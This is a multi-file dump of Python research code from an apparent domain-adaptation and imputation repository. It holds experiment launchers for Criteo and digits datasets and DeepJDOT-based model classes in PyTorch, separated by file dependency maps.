"/src/models/criteo/dann_criteo.py": ["/src/eval/utils_eval.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/src/utils/utils_network.py": ["/src/utils/network.py"], "/orchestration/launcher.py": ["/experiments/__init__.py"], "/src/dataset/dataset_criteo.py": ["/src/dataset/sampler.py"], "/src/models/digits/dann_imput_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/plotting/utils_plotting.py", "/src/utils/network.py", "/src/utils/utils_network.py"]}
|
28,028
|
mkirchmeyer/adaptation-imputation
|
refs/heads/main
|
/experiments/launcher/criteo_binary.py
|
import random
import numpy as np
import torch
import time
from experiments.launcher.config import Config, dummy_model_config
from src.dataset.utils_dataset import create_dataset_criteo
from src.models.criteo.dann_imput_criteo import DANNImput
from src.models.criteo.dann_criteo import DANN
from src.utils.utils_network import create_logger, set_logger, set_nbepoch, create_log_name
n_class = 2
debug = False
if debug:
config = dummy_model_config
in_memory = False
else:
config = Config.get_config_from_args()
in_memory = True
# python RNG
random.seed(config.model.random_seed)
# pytorch RNGs
torch.manual_seed(config.model.random_seed)
torch.backends.cudnn.deterministic = True
if torch.cuda.is_available():
torch.cuda.manual_seed_all(config.model.random_seed)
# numpy RNG
np.random.seed(config.model.random_seed)
cuda = torch.cuda.is_available()
if cuda:
torch.cuda.set_device(config.run.gpu_id)
name = create_log_name("criteo", config)
logger = create_logger(f"./results/{name}.log")
logger.info(f"config: {config}")
feature_sizes = np.loadtxt('../../data/feature_sizes.txt', delimiter=',')
if config.model.use_categorical:
indexes = np.arange(13, 39)
feature_sizes = np.array([int(x) for x in feature_sizes])[13:]
else:
indexes = np.array([25])
feature_sizes = None
logger.info("####################")
logger.info(f"Known users => New users")
logger.info("===DATA===")
data_loader_train_s, data_loader_test_s, data_loader_train_t, data_loader_test_t, data_loader_train_s_init = \
create_dataset_criteo(config, "../..", is_balanced=config.model.is_balanced, in_memory=in_memory, indexes=indexes)
n_dim = (len(data_loader_train_s.dataset), 10)
logger.info(f"n_instances_train_s: {len(data_loader_train_s.dataset)}")
logger.info(f"n_instances_train_t: {len(data_loader_train_t.dataset)}")
logger.info(f"n_instances_test_s: {len(data_loader_test_s.dataset)}")
logger.info(f"n_instances_test_t: {len(data_loader_test_t.dataset)}")
final_metrics = {
"source_classif": dict(),
"target_classif": dict()
}
start_time = time.time()
if config.model.mode == "dann":
logger.info("===DANN===")
model = DANN(data_loader_train_s, data_loader_train_t, data_loader_train_s_init=data_loader_train_s_init,
model_config=config.model, cuda=cuda, data_loader_test_s=data_loader_test_s,
data_loader_test_t=data_loader_test_t, feature_sizes=feature_sizes, n_class=n_class,
logger_file=logger)
set_nbepoch(model, config.training.n_epochs)
model.fit()
if config.model.mode == "dann_imput":
logger.info("===DANN IMPUT===")
model = DANNImput(data_loader_train_s, data_loader_train_t, model_config=config.model, cuda=cuda,
data_loader_train_s_init=data_loader_train_s_init, feature_sizes=feature_sizes,
data_loader_test_s=data_loader_test_s, data_loader_test_t=data_loader_test_t, n_class=n_class)
set_logger(model, logger)
set_nbepoch(model, config.training.n_epochs)
model.fit()
final_metrics["source_classif"] = {
"test_loss": model.loss_test_s,
"test_acc": model.acc_test_s,
"test_auc": model.auc_test_s
}
final_metrics["target_classif"] = {
"test_loss": model.loss_test_t,
"test_acc": model.acc_test_t,
"test_auc": model.auc_test_t
}
if config.model.mode == "dann":
final_metrics["domain"] = {
"test_loss": model.loss_d_test,
"test_acc": model.acc_d_test
}
elif config.model.mode.find("dann_imput") != -1:
final_metrics["domain1"] = {
"test_loss": model.loss_d1_test,
"test_acc": model.acc_d1_test
}
final_metrics["domain2"] = {
"test_loss": model.loss_d2_test,
"test_acc": model.acc_d2_test
}
final_metrics["elapsed_time"] = time.time() - start_time
final_metrics["status"] = "completed"
logger.info(final_metrics)
|
{"/src/eval/utils_eval.py": ["/src/utils/utils_network.py"], "/experiments/launcher/criteo_binary.py": ["/experiments/launcher/config.py", "/src/dataset/utils_dataset.py", "/src/models/criteo/dann_criteo.py", "/src/utils/utils_network.py"], "/src/models/digits/djdot_imput_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/models/digits/djdot_digits.py", "/src/plotting/utils_plotting.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/src/models/digits/djdot_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/plotting/utils_plotting.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/experiments/launcher/digits_binary.py": ["/experiments/launcher/config.py", "/src/dataset/utils_dataset.py", "/src/models/digits/dann_imput_digits.py", "/src/models/digits/djdot_imput_digits.py", "/src/models/digits/djdot_digits.py", "/src/utils/utils_network.py"], "/src/plotting/utils_plotting.py": ["/src/utils/utils_network.py"], "/experiments/__init__.py": ["/experiments/launcher/experiments_criteo.py", "/experiments/launcher/experiments_mnist_mnistm.py"], "/src/dataset/utils_dataset.py": ["/src/dataset/dataset_criteo.py", "/experiments/launcher/config.py", "/src/dataset/sampler.py"], "/src/models/criteo/dann_criteo.py": ["/src/eval/utils_eval.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/src/utils/utils_network.py": ["/src/utils/network.py"], "/orchestration/launcher.py": ["/experiments/__init__.py"], "/src/dataset/dataset_criteo.py": ["/src/dataset/sampler.py"], "/src/models/digits/dann_imput_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/plotting/utils_plotting.py", "/src/utils/network.py", "/src/utils/utils_network.py"]}
|
28,029
|
mkirchmeyer/adaptation-imputation
|
refs/heads/main
|
/src/models/digits/djdot_imput_digits.py
|
import torch
import torch.nn.functional as F
from itertools import cycle
from time import clock as tick
import torch.optim as optim
from experiments.launcher.config import DatasetConfig
from src.eval.utils_eval import evaluate_data_imput_classifier, compute_mse_imput
from src.models.digits.djdot_digits import dist_torch
import ot
import numpy as np
from src.plotting.utils_plotting import plot_data_frontier_digits
from src.utils.network import weight_init_glorot_uniform
from src.utils.utils_network import set_lr, get_models_imput
class DJDOTImput(object):
def __init__(self, data_loader_train_s, data_loader_train_t, model_config, cuda=False, logger_file=None,
data_loader_test_s=None, data_loader_test_t=None, dataset=DatasetConfig(),
data_loader_train_s_init=None, n_class=10):
self.data_loader_train_s = data_loader_train_s
self.data_loader_train_t = data_loader_train_t
self.data_loader_test_t = data_loader_test_t
self.data_loader_test_s = data_loader_test_s
self.data_loader_train_s_init = data_loader_train_s_init
self.n_class = 10
self.cuda = cuda
self.logger = logger_file
self.crop_dim = int(dataset.im_size * model_config.crop_ratio)
self.dataset = dataset
self.activate_adaptation_imp = model_config.activate_adaptation_imp
self.activate_mse = model_config.activate_mse
self.activate_adaptation_d1 = model_config.activate_adaptation_d1
self.lr_decay_epoch = model_config.epoch_to_start_align
self.lr_decay_factor = 0.5
self.epoch_to_start_align = model_config.epoch_to_start_align
self.model_config = model_config
self.output_fig = model_config.output_fig
self.initialize_model = model_config.initialize_model
self.stop_grad = model_config.stop_grad
self.alpha = model_config.djdot_alpha
feat_extractor1, feat_extractor2, data_classifier, domain_classifier1, domain_classifier2, reconstructor = \
get_models_imput(model_config, n_class, dataset)
feat_extractor1.apply(weight_init_glorot_uniform)
feat_extractor2.apply(weight_init_glorot_uniform)
data_classifier.apply(weight_init_glorot_uniform)
domain_classifier1.apply(weight_init_glorot_uniform)
domain_classifier2.apply(weight_init_glorot_uniform)
reconstructor.apply(weight_init_glorot_uniform)
self.feat_extractor1 = feat_extractor1
self.feat_extractor2 = feat_extractor2
self.data_classifier = data_classifier
self.reconstructor = reconstructor
if self.cuda:
self.feat_extractor1.cuda()
self.feat_extractor2.cuda()
self.data_classifier.cuda()
self.reconstructor.cuda()
self.optimizer_g1 = optim.Adam(self.feat_extractor1.parameters(), lr=model_config.init_lr)
self.optimizer_g2 = optim.Adam(self.feat_extractor2.parameters(), lr=model_config.init_lr)
self.optimizer_h = optim.Adam(self.reconstructor.parameters(), lr=model_config.init_lr)
self.optimizer_data_classifier = optim.Adam(self.data_classifier.parameters(), lr=model_config.init_lr)
self.init_lr = model_config.init_lr
self.adaptive_lr = model_config.adaptive_lr
def fit(self):
self.loss_history = []
self.error_history = []
self.mask_1 = torch.ones(size=(self.dataset.channel, self.dataset.im_size, self.dataset.im_size))
self.mask_2 = torch.ones(size=(self.dataset.channel, self.dataset.im_size, self.dataset.im_size))
if self.cuda:
self.mask_1 = self.mask_1.cuda()
self.mask_2 = self.mask_2.cuda()
self.mask_1[:, :self.crop_dim, :] = 0.0
self.mask_2[:, self.crop_dim:, :] = 0.0
if self.initialize_model:
self.logger.info("Initialize model")
for epoch in range(self.epoch_to_start_align):
self.feat_extractor1.train()
self.feat_extractor2.train()
self.data_classifier.train()
tic = tick()
for batch_idx, (X_batch_s, y_batch_s) in enumerate(self.data_loader_train_s_init):
y_batch_s = y_batch_s.view(-1)
self.feat_extractor1.zero_grad()
self.feat_extractor2.zero_grad()
self.data_classifier.zero_grad()
if self.cuda:
X_batch_s = X_batch_s.cuda()
y_batch_s = y_batch_s.cuda()
X_batch_s1 = torch.mul(X_batch_s, self.mask_1)
X_batch_s2 = torch.mul(X_batch_s, self.mask_2)
size = X_batch_s.size()
output_feat_s1 = self.feat_extractor1(X_batch_s1)
output_feat_s2 = self.feat_extractor2(X_batch_s2)
output_class_s = self.data_classifier(torch.cat((output_feat_s1, output_feat_s2), 1))
loss = F.cross_entropy(output_class_s, y_batch_s)
loss.backward()
self.optimizer_g1.step()
self.optimizer_g2.step()
self.optimizer_data_classifier.step()
toc = tick() - tic
self.logger.info("\nTrain epoch: {}/{} {:2.2f}s \tLoss: {:.6f} Dist_loss:{:.6f}".format(
epoch, self.nb_epochs, toc, loss.item(), 0))
if epoch % 5 == 0 and epoch != 0:
evaluate_data_imput_classifier(self, is_test=True, is_target=False)
evaluate_data_imput_classifier(self, is_test=True, is_target=True)
self.loss_history.append(loss.item())
self.error_history.append(loss.item())
start_epoch = self.epoch_to_start_align
self.logger.info(f"Finished initializing with batch size: {size}")
else:
start_epoch = 0
if self.output_fig and start_epoch != 0:
plot_data_frontier_digits(self, self.data_loader_test_s, self.data_loader_test_t, "djdot_imput_10",
is_imput=True)
self.logger.info("Start aligning")
for epoch in range(start_epoch, self.nb_epochs):
self.feat_extractor1.train()
self.feat_extractor2.train()
self.data_classifier.train()
self.reconstructor.train()
tic = tick()
self.T_batches = cycle(iter(self.data_loader_train_t))
for batch_idx, (X_batch_s, y_batch_s) in enumerate(self.data_loader_train_s):
y_batch_s = y_batch_s.view(-1)
p = (batch_idx + (epoch - start_epoch) * len(self.data_loader_train_s)) / (
len(self.data_loader_train_s) * (self.nb_epochs - start_epoch))
if self.adaptive_lr:
lr = self.init_lr / (1. + 10 * p) ** 0.75
set_lr(self.optimizer_g1, lr)
set_lr(self.optimizer_g2, lr)
set_lr(self.optimizer_h, lr)
set_lr(self.optimizer_data_classifier, lr)
self.feat_extractor1.zero_grad()
self.feat_extractor2.zero_grad()
self.data_classifier.zero_grad()
self.reconstructor.zero_grad()
X_batch_t, _ = next(self.T_batches)
if self.cuda:
X_batch_t = X_batch_t.cuda()
X_batch_s = X_batch_s.cuda()
y_batch_s = y_batch_s.cuda()
X_batch_s1 = torch.mul(X_batch_s, self.mask_1)
X_batch_s2 = torch.mul(X_batch_s, self.mask_2)
X_batch_t1 = torch.mul(X_batch_t, self.mask_1)
output_feat_s1 = self.feat_extractor1(X_batch_s1)
output_feat_s2 = self.feat_extractor2(X_batch_s2)
self.grad_scale = 2. / (1. + np.exp(-10 * p)) - 1
if self.stop_grad:
with torch.no_grad():
output_feat_s1_da = self.feat_extractor1(X_batch_s1)
else:
output_feat_s1_da = output_feat_s1
output_feat_s2_imputed_da = self.reconstructor(output_feat_s1_da)
# -----------------------------------------------------------------
# source classification
# -----------------------------------------------------------------
output_class_s = self.data_classifier(torch.cat((output_feat_s1, output_feat_s2), 1))
loss = F.cross_entropy(output_class_s, y_batch_s)
error = loss
# -----------------------------------------------------------------
# DJDOT domain classif
# -----------------------------------------------------------------
if self.activate_adaptation_d1:
output_feat_t1 = self.feat_extractor1(X_batch_t1)
reconstructed_t1 = self.reconstructor(output_feat_t1)
M1 = self.alpha * dist_torch(torch.cat((output_feat_s1, output_feat_s2_imputed_da), 1),
torch.cat((output_feat_t1, reconstructed_t1), 1))
gamma1 = torch.from_numpy(ot.emd(ot.unif(2 * output_feat_s1.size(0)),
ot.unif(2 * output_feat_t1.size(0)),
M1.cpu().detach().numpy())).float()
if self.cuda:
gamma1 = gamma1.cuda()
dist_loss1 = torch.sum(gamma1 * M1) * self.grad_scale
error += dist_loss1
else:
dist_loss1 = torch.zeros(1)
# -----------------------------------------------------------------
# Imputation
# -----------------------------------------------------------------
# Adaptation Imput
if self.activate_adaptation_imp:
M2 = self.alpha * dist_torch(output_feat_s2_imputed_da, output_feat_s2)
gamma2 = torch.from_numpy(ot.emd(ot.unif(output_feat_s2_imputed_da.size(0)),
ot.unif(output_feat_s2.size(0)),
M2.cpu().detach().numpy())).float()
if self.cuda:
gamma2 = gamma2.cuda()
dist_loss2 = torch.sum(gamma2 * M2) * self.grad_scale
error += dist_loss2
else:
dist_loss2 = torch.zeros(1)
# MSE Imput
if self.activate_mse:
dist_loss_mse = torch.dist(output_feat_s2, output_feat_s2_imputed_da, 2)
error += dist_loss_mse
else:
dist_loss_mse = torch.zeros(1)
error.backward()
self.optimizer_data_classifier.step()
self.optimizer_h.step()
self.optimizer_g1.step()
self.optimizer_g2.step()
toc = tick() - tic
self.logger.info("\nTrain epoch: {}/{} {:2.2f}s \tLoss: {:.6f} Dist_loss1:{:.6f} Dist_loss2:{:.6f} "
"Dist_lossMSE:{:.6f}".format(epoch, self.nb_epochs, toc, loss.item(), dist_loss1.item(),
dist_loss2.item(), dist_loss_mse.item()))
self.loss_history.append(loss.item())
self.error_history.append(error.item())
if epoch % 5 == 0 and epoch != 0:
# evaluate_data_imput_classifier(self, is_test=True, is_target=False)
evaluate_data_imput_classifier(self, is_test=True, is_target=True)
compute_mse_imput(self, is_target=True)
compute_mse_imput(self, is_target=False)
self.loss_test_s, self.acc_test_s, _, _ = evaluate_data_imput_classifier(self, is_test=True, is_target=False)
self.loss_test_t, self.acc_test_t, _, _ = evaluate_data_imput_classifier(self, is_test=True, is_target=True)
compute_mse_imput(self, is_target=True)
compute_mse_imput(self, is_target=False)
if self.output_fig:
plot_data_frontier_digits(self, self.data_loader_test_s, self.data_loader_test_t, "djdot_imput_100",
is_imput=True)
|
{"/src/eval/utils_eval.py": ["/src/utils/utils_network.py"], "/experiments/launcher/criteo_binary.py": ["/experiments/launcher/config.py", "/src/dataset/utils_dataset.py", "/src/models/criteo/dann_criteo.py", "/src/utils/utils_network.py"], "/src/models/digits/djdot_imput_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/models/digits/djdot_digits.py", "/src/plotting/utils_plotting.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/src/models/digits/djdot_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/plotting/utils_plotting.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/experiments/launcher/digits_binary.py": ["/experiments/launcher/config.py", "/src/dataset/utils_dataset.py", "/src/models/digits/dann_imput_digits.py", "/src/models/digits/djdot_imput_digits.py", "/src/models/digits/djdot_digits.py", "/src/utils/utils_network.py"], "/src/plotting/utils_plotting.py": ["/src/utils/utils_network.py"], "/experiments/__init__.py": ["/experiments/launcher/experiments_criteo.py", "/experiments/launcher/experiments_mnist_mnistm.py"], "/src/dataset/utils_dataset.py": ["/src/dataset/dataset_criteo.py", "/experiments/launcher/config.py", "/src/dataset/sampler.py"], "/src/models/criteo/dann_criteo.py": ["/src/eval/utils_eval.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/src/utils/utils_network.py": ["/src/utils/network.py"], "/orchestration/launcher.py": ["/experiments/__init__.py"], "/src/dataset/dataset_criteo.py": ["/src/dataset/sampler.py"], "/src/models/digits/dann_imput_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/plotting/utils_plotting.py", "/src/utils/network.py", "/src/utils/utils_network.py"]}
|
28,030
|
mkirchmeyer/adaptation-imputation
|
refs/heads/main
|
/src/models/digits/djdot_digits.py
|
from time import clock as tick
import torch
from experiments.launcher.config import DatasetConfig
from src.eval.utils_eval import evaluate_data_classifier
from src.plotting.utils_plotting import plot_data_frontier_digits
from src.utils.network import weight_init_glorot_uniform
from src.utils.utils_network import set_lr, get_optimizer, get_models
import torch.nn.functional as F
import ot
from itertools import cycle
dtype = 'torch.FloatTensor'
class DeepJDOT(object):
def __init__(self, data_loader_train_s, data_loader_train_t, model_config,
cuda=False, logger_file=None, data_loader_test_s=None, data_loader_test_t=None,
dataset=DatasetConfig(), n_class=10, data_loader_train_s_init=None):
self.data_loader_train_s = data_loader_train_s
self.data_loader_train_t = data_loader_train_t
self.data_loader_test_s = data_loader_test_s
self.data_loader_test_t = data_loader_test_t
self.data_loader_train_s_init = data_loader_train_s_init
self.cuda = cuda
self.alpha = model_config.djdot_alpha
self.epoch_to_start_align = model_config.epoch_to_start_align # start aligning distrib from this step
self.lr_decay_epoch = model_config.epoch_to_start_align
self.lr_decay_factor = 0.5
self.adapt_only_first = model_config.adapt_only_first
self.crop_dim = 0 if model_config.upper_bound and not self.adapt_only_first else \
int(dataset.im_size * model_config.crop_ratio)
self.dataset = dataset
self.output_fig = model_config.output_fig
self.n_class = n_class
self.initialize_model = model_config.initialize_model
self.model_config = model_config
feat_extractor, data_classifier, _ = get_models(model_config, n_class, dataset)
feat_extractor.apply(weight_init_glorot_uniform)
data_classifier.apply(weight_init_glorot_uniform)
self.feat_extractor = feat_extractor
self.data_classifier = data_classifier
if self.cuda:
self.feat_extractor.cuda()
self.data_classifier.cuda()
self.optimizer_feat_extractor, self.optimizer_data_classifier, _ = get_optimizer(model_config, self)
self.init_lr = model_config.init_lr
self.adaptive_lr = model_config.adaptive_lr
self.logger = logger_file
def fit(self):
self.loss_history = []
self.error_history = []
if self.crop_dim != 0:
self.mask_t = torch.ones(size=(self.dataset.channel, self.dataset.im_size, self.dataset.im_size))
if self.cuda:
self.mask_t = self.mask_t.cuda()
self.mask_t[:, :self.crop_dim, :] = 0.0
if self.initialize_model:
self.logger.info("Initialize DJDOT")
for epoch in range(self.epoch_to_start_align):
self.feat_extractor.train()
self.data_classifier.train()
tic = tick()
for batch_idx, (X_batch_s, y_batch_s) in enumerate(self.data_loader_train_s_init):
y_batch_s = y_batch_s.view(-1)
self.feat_extractor.zero_grad()
self.data_classifier.zero_grad()
if self.cuda:
X_batch_s = X_batch_s.cuda()
y_batch_s = y_batch_s.cuda()
size = X_batch_s.size()
if self.adapt_only_first:
X_batch_s = torch.mul(X_batch_s, self.mask_t)
output_feat_s = self.feat_extractor(X_batch_s)
output_class_s = self.data_classifier(output_feat_s)
loss = F.cross_entropy(output_class_s, y_batch_s)
loss.backward()
self.optimizer_feat_extractor.step()
self.optimizer_data_classifier.step()
toc = tick() - tic
self.logger.info("\nTrain epoch: {}/{} {:2.2f}s \tLoss: {:.6f} Dist_loss:{:.6f}".format(
epoch, self.nb_epochs, toc, loss.item(), 0))
if epoch % 5 == 0 and epoch != 0:
evaluate_data_classifier(self, is_test=True, is_target=False)
evaluate_data_classifier(self, is_test=True, is_target=True)
self.loss_history.append(loss.item())
self.error_history.append(loss.item())
start_epoch = self.epoch_to_start_align
self.logger.info(f"Finished initializing with batch size: {size}")
else:
start_epoch = 0
if self.output_fig:
if start_epoch != 0:
plot_data_frontier_digits(self, self.data_loader_test_s, self.data_loader_test_t, "djdot_10")
self.logger.info("Start aligning")
for epoch in range(start_epoch, self.nb_epochs):
self.feat_extractor.train()
self.data_classifier.train()
tic = tick()
self.T_batches = cycle(iter(self.data_loader_train_t))
for batch_idx, (X_batch_s, y_batch_s) in enumerate(self.data_loader_train_s):
y_batch_s = y_batch_s.view(-1)
self.feat_extractor.zero_grad()
self.data_classifier.zero_grad()
p = (batch_idx + (epoch - start_epoch) * len(self.data_loader_train_s)) / (
len(self.data_loader_train_s) * (self.nb_epochs - start_epoch))
if self.adaptive_lr:
lr = self.init_lr / (1. + 10 * p) ** 0.75
set_lr(self.optimizer_feat_extractor, lr)
set_lr(self.optimizer_data_classifier, lr)
X_batch_t, _ = next(self.T_batches)
if self.cuda:
X_batch_t = X_batch_t.cuda()
X_batch_s = X_batch_s.cuda()
y_batch_s = y_batch_s.cuda()
if self.crop_dim != 0:
X_batch_t = torch.mul(X_batch_t, self.mask_t)
if self.adapt_only_first:
X_batch_s = torch.mul(X_batch_s, self.mask_t)
# Source Domain Data : forward feature extraction + data classifier
output_feat_s = self.feat_extractor(X_batch_s)
output_class_s = self.data_classifier(output_feat_s)
loss = F.cross_entropy(output_class_s, y_batch_s)
# compute distribution distance
if epoch >= self.epoch_to_start_align:
g_batch_s = self.feat_extractor(X_batch_s)
g_batch_t = self.feat_extractor(X_batch_t)
M = self.alpha * dist_torch(g_batch_s, g_batch_t)
gamma = torch.from_numpy(ot.emd(ot.unif(g_batch_s.size(0)),
ot.unif(g_batch_t.size(0)),
M.cpu().detach().numpy())).float()
if self.cuda:
gamma = gamma.cuda()
dist_loss = torch.sum(gamma * M)
error = loss + dist_loss
else:
error = loss
dist_loss = torch.zeros(1)
error.backward()
self.optimizer_feat_extractor.step()
self.optimizer_data_classifier.step()
toc = tick() - tic
self.logger.info("\nTrain epoch: {}/{} {:2.2f}s \tLoss: {:.6f} Dist_loss:{:.6f}".format(
epoch, self.nb_epochs, toc, loss.item(), dist_loss.item()))
if epoch % 5 == 0 and epoch != 0:
evaluate_data_classifier(self, is_test=True, is_target=False)
evaluate_data_classifier(self, is_test=True, is_target=True)
self.loss_history.append(loss.item())
self.error_history.append(error.item())
self.loss_test_s, self.acc_test_s, _, _ = evaluate_data_classifier(self, is_test=True, is_target=False)
self.loss_test_t, self.acc_test_t, _, _ = evaluate_data_classifier(self, is_test=True, is_target=True)
if self.output_fig:
plot_data_frontier_digits(self, self.data_loader_test_s, self.data_loader_test_t, "djdot_100")
def dist_torch(x1, x2):
x1p = x1.pow(2).sum(1).unsqueeze(1)
x2p = x2.pow(2).sum(1).unsqueeze(1)
prod_x1x2 = torch.mm(x1, x2.t())
distance = x1p.expand_as(prod_x1x2) + x2p.t().expand_as(prod_x1x2) - 2 * prod_x1x2
return distance
|
{"/src/eval/utils_eval.py": ["/src/utils/utils_network.py"], "/experiments/launcher/criteo_binary.py": ["/experiments/launcher/config.py", "/src/dataset/utils_dataset.py", "/src/models/criteo/dann_criteo.py", "/src/utils/utils_network.py"], "/src/models/digits/djdot_imput_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/models/digits/djdot_digits.py", "/src/plotting/utils_plotting.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/src/models/digits/djdot_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/plotting/utils_plotting.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/experiments/launcher/digits_binary.py": ["/experiments/launcher/config.py", "/src/dataset/utils_dataset.py", "/src/models/digits/dann_imput_digits.py", "/src/models/digits/djdot_imput_digits.py", "/src/models/digits/djdot_digits.py", "/src/utils/utils_network.py"], "/src/plotting/utils_plotting.py": ["/src/utils/utils_network.py"], "/experiments/__init__.py": ["/experiments/launcher/experiments_criteo.py", "/experiments/launcher/experiments_mnist_mnistm.py"], "/src/dataset/utils_dataset.py": ["/src/dataset/dataset_criteo.py", "/experiments/launcher/config.py", "/src/dataset/sampler.py"], "/src/models/criteo/dann_criteo.py": ["/src/eval/utils_eval.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/src/utils/utils_network.py": ["/src/utils/network.py"], "/orchestration/launcher.py": ["/experiments/__init__.py"], "/src/dataset/dataset_criteo.py": ["/src/dataset/sampler.py"], "/src/models/digits/dann_imput_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/plotting/utils_plotting.py", "/src/utils/network.py", "/src/utils/utils_network.py"]}
|
28,031
|
mkirchmeyer/adaptation-imputation
|
refs/heads/main
|
/experiments/launcher/digits_binary.py
|
import random
import numpy as np
import torch
import time
from experiments.launcher.config import Config, dummy_model_config
from src.dataset.utils_dataset import create_dataset
from src.models.digits.dann_imput_digits import DANNImput
from src.models.digits.dann_digits import DANN
from src.models.digits.djdot_imput_digits import DJDOTImput
from src.models.digits.djdot_digits import DeepJDOT
from src.utils.utils_network import create_logger, set_nbepoch, create_log_name
n_class = 10
debug = False
if debug:
config = dummy_model_config
in_memory = False
else:
config = Config.get_config_from_args()
in_memory = True
# python RNG
random.seed(config.model.random_seed)
# pytorch RNGs
torch.manual_seed(config.model.random_seed)
torch.backends.cudnn.deterministic = True
if torch.cuda.is_available():
torch.cuda.manual_seed_all(config.model.random_seed)
# numpy RNG
np.random.seed(config.model.random_seed)
cuda = torch.cuda.is_available()
if cuda:
torch.cuda.set_device(config.run.gpu_id)
name = create_log_name("digits", config)
logger = create_logger(f"./results/{name}.log")
logger.info(f"config: {config}")
logger.info("####################")
logger.info(f"{config.model.source} => {config.model.target}")
logger.info("===DATA===")
dataset, data_loader_train_s, data_loader_test_s, data_loader_train_t, data_loader_test_t, data_loader_train_s_init = \
create_dataset(config, "../..", in_memory=in_memory, is_balanced=config.model.is_balanced)
n_dim = (len(data_loader_train_s.dataset), 10)
n_instances_train_s = len(data_loader_train_s.dataset)
n_instances_train_t = len(data_loader_train_t.dataset)
logger.info(f"n_instances_train_s: {n_instances_train_s}")
logger.info(f"n_instances_train_t: {n_instances_train_t}")
final_metrics = {
"source_classif": dict(),
"target_classif": dict()
}
start_time = time.time()
if config.model.mode == "dann":
logger.info("===DANN===")
logger.info(f"upper_bound: {config.model.upper_bound}")
model = DANN(data_loader_train_s, data_loader_train_t, model_config=config.model, cuda=cuda,
data_loader_test_s=data_loader_test_s, data_loader_test_t=data_loader_test_t, dataset=dataset,
data_loader_train_s_init=data_loader_train_s_init, logger_file=logger, n_class=n_class)
set_nbepoch(model, config.training.n_epochs)
model.fit()
if config.model.mode == "djdot":
logger.info("===DEEPJDOT===")
logger.info(f"distance: {config.model.mode}")
logger.info(f"upper_bound: {config.model.upper_bound}")
model = DeepJDOT(data_loader_train_s, data_loader_train_t, model_config=config.model, cuda=cuda,
data_loader_test_t=data_loader_test_t, data_loader_test_s=data_loader_test_s, logger_file=logger,
data_loader_train_s_init=data_loader_train_s_init, dataset=dataset, n_class=n_class)
set_nbepoch(model, config.training.n_epochs)
model.fit()
if config.model.mode == "dann_imput":
logger.info("===DANN IMPUT===")
logger.info(f"upper_bound: {config.model.upper_bound}")
model = DANNImput(data_loader_train_s, data_loader_train_t, model_config=config.model, cuda=cuda,
data_loader_train_s_init=data_loader_train_s_init, data_loader_test_s=data_loader_test_s,
data_loader_test_t=data_loader_test_t, dataset=dataset, n_class=n_class, logger_file=logger)
set_nbepoch(model, config.training.n_epochs)
model.fit()
if config.model.mode == "djdot_imput":
logger.info("===Djdot IMPUT===")
logger.info(f"upper_bound: {config.model.upper_bound}")
model = DJDOTImput(data_loader_train_s, data_loader_train_t, model_config=config.model, cuda=cuda,
data_loader_test_s=data_loader_test_s, data_loader_test_t=data_loader_test_t,
dataset=dataset, data_loader_train_s_init=data_loader_train_s_init, n_class=n_class,
logger_file=logger)
set_nbepoch(model, config.training.n_epochs)
model.fit()
final_metrics["source_classif"] = {
"test_loss": model.loss_test_s,
"test_acc": model.acc_test_s
}
final_metrics["target_classif"] = {
"test_loss": model.loss_test_t,
"test_acc": model.acc_test_t
}
if config.model.mode == "dann":
final_metrics["domain"] = {
"test_loss": model.loss_d_test,
"test_acc": model.acc_d_test
}
elif config.model.mode.find("dann_imput") != -1:
final_metrics["domain1"] = {
"test_loss": model.loss_d1_test,
"test_acc": model.acc_d1_test
}
final_metrics["domain2"] = {
"test_loss": model.loss_d2_test,
"test_acc": model.acc_d2_test
}
final_metrics["elapsed_time"] = time.time() - start_time
final_metrics["status"] = "completed"
logger.info(final_metrics)
|
{"/src/eval/utils_eval.py": ["/src/utils/utils_network.py"], "/experiments/launcher/criteo_binary.py": ["/experiments/launcher/config.py", "/src/dataset/utils_dataset.py", "/src/models/criteo/dann_criteo.py", "/src/utils/utils_network.py"], "/src/models/digits/djdot_imput_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/models/digits/djdot_digits.py", "/src/plotting/utils_plotting.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/src/models/digits/djdot_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/plotting/utils_plotting.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/experiments/launcher/digits_binary.py": ["/experiments/launcher/config.py", "/src/dataset/utils_dataset.py", "/src/models/digits/dann_imput_digits.py", "/src/models/digits/djdot_imput_digits.py", "/src/models/digits/djdot_digits.py", "/src/utils/utils_network.py"], "/src/plotting/utils_plotting.py": ["/src/utils/utils_network.py"], "/experiments/__init__.py": ["/experiments/launcher/experiments_criteo.py", "/experiments/launcher/experiments_mnist_mnistm.py"], "/src/dataset/utils_dataset.py": ["/src/dataset/dataset_criteo.py", "/experiments/launcher/config.py", "/src/dataset/sampler.py"], "/src/models/criteo/dann_criteo.py": ["/src/eval/utils_eval.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/src/utils/utils_network.py": ["/src/utils/network.py"], "/orchestration/launcher.py": ["/experiments/__init__.py"], "/src/dataset/dataset_criteo.py": ["/src/dataset/sampler.py"], "/src/models/digits/dann_imput_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/plotting/utils_plotting.py", 